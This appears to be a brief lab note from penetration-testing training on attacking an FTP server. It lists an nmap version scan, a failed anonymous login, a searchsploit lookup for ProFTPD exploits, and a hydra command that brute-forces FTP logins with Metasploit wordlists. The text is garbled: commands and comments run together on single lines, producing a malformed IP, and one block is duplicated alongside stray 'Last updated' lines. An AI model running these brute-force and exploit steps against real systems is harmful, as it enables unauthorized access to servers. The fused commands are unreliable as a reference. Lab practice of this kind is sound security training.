🔬FTP
Lab 1
nmap -sV 192.209.45.321/tcp open ftp ProFTPD 1.3.5aftp 192.209.45.3
# anonymous login failedls -al /usr/share/nmap/scripts | grep ftp-*
Brute-Force

Last updated
nmap -sV 192.209.45.321/tcp open ftp ProFTPD 1.3.5aftp 192.209.45.3
# anonymous login failedls -al /usr/share/nmap/scripts | grep ftp-*

Last updated
searchsploit ProFTPD
# check exploits for the specific versionhydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.209.45.3 -t 4 ftpftp 192.209.45.3